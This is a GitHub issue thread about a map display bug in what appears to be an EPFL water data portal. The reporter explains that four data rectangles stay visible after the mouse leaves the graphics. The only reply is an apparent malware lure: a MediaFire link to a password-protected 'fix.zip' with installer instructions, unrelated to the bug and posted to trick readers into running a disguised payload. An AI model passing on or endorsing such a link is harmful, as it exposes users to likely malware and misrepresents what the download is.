### ISSUE TITLE
Display bug

### ISSUE THREAD

**Issue by AnderssonDan-epfl** [EPFL-ENAC/EML-Water-Portal#40]
@charlottegiseleweil Here's a screenshot of the problem I explained at the zoom meeting. As I explained, the four rectangles containing the data are always present even when I have the mouse over the map. I think it would be nicer if when the mouse leaves the graphics, the rectangles stopped being visible. I've opened the portal with Safari and Google Chrome and the same thing happens.

![Capture d’écran 2024-08-26 à 16 16 28](https://github.com/user-attachments/assets/1e1e68cc-0022-44ee-bf5b-a16a1a14af2f)

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
